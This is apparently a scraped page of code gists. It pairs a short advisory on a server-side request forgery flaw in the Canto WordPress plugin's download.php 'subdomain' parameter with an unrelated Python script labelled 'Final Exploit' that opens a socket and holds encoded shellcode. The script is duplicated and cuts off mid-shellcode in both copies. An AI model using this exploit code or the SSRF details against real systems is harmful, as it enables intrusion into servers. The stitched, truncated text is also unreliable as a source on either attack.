This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Description | |
The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF. | |
"subdomain" parameter in Canto WordPress Plugin is vulnerable to | |
Server-Side Request Forgery (SSRF) which allows an attacker to make a | |
request to an internal or external server & retrieve content hosted on | |
the server. Due to this, an attacker can perform attacks such as | |
Cross-Site Scripting, Cross-Site Port Attack, abuse Cross-Origin | |
resource sharing, or access internal resources hosted on the server. | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
# Final Exploit | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.settimeout(30) | |
shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" | |
"\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07" | |
"\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94" | |
"\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b" | |
"\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
# Final Exploit | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.settimeout(30) | |
shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" | |
"\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07" | |
"\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94" | |
"\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b" | |
"\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d" |